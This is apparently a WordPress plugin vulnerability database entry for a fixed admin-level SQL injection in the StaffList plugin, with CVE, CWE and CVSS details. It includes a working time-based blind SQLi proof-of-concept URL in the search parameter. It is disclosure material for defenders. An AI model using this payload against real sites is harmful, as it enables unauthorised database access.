WordPress Plugin Vulnerabilities

StaffList < 3.1.5 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement when searching for Staff in the admin dashboard, leading to an SQL Injection

Proof of Concept

https://example.com/wp-admin/admin.php?page=stafflist&search=test%'+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)+AND+'aa%'='aa

Affects Plugins

Plugin icon
stafflist
Fixed in 3.1.5

References

CVE
CVE-2022-1556
Exploitdb
50928
URL
https://packetstormsecurity.com/files/#166918/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Hassan Khan Yusufzai
Submitter
Hassan Khan Yusufzai
Submitter website
http://hassankhanyusufzai.com
Submitter twitter
Splint3r7
Verified
Yes
WPVDB ID
04890549-6bd1-44dd-8bce-7125c01be5d4

Timeline

Publicly Published
2022-05-02 (about 2 years ago)
Added
2022-05-03 (about 2 years ago)
Last Updated
2023-03-14 (about 1 years ago)

Other

Published
Title
Published
2023-06-08
Title
Ultimate Addons for Contact Form 7 3.1.23 - Subscriber+ SQLi
Published
2022-02-28
Title
Advanced Booking Calendar < 1.7.0 - Unauthenticated SQL Injection
Published
2021-06-29
Title
Handsome Testimonials & Reviews < 2.1.1 - Authenticated (Subscriber+) SQL Injection
Published
2023-01-17
Title
MainWP Google Analytics Extension < 4.0.5 - Subscriber+ SQLi
Published
2015-07-22
Title
Easy Social Icons < 1.2.4 - Authenticated SQL Injection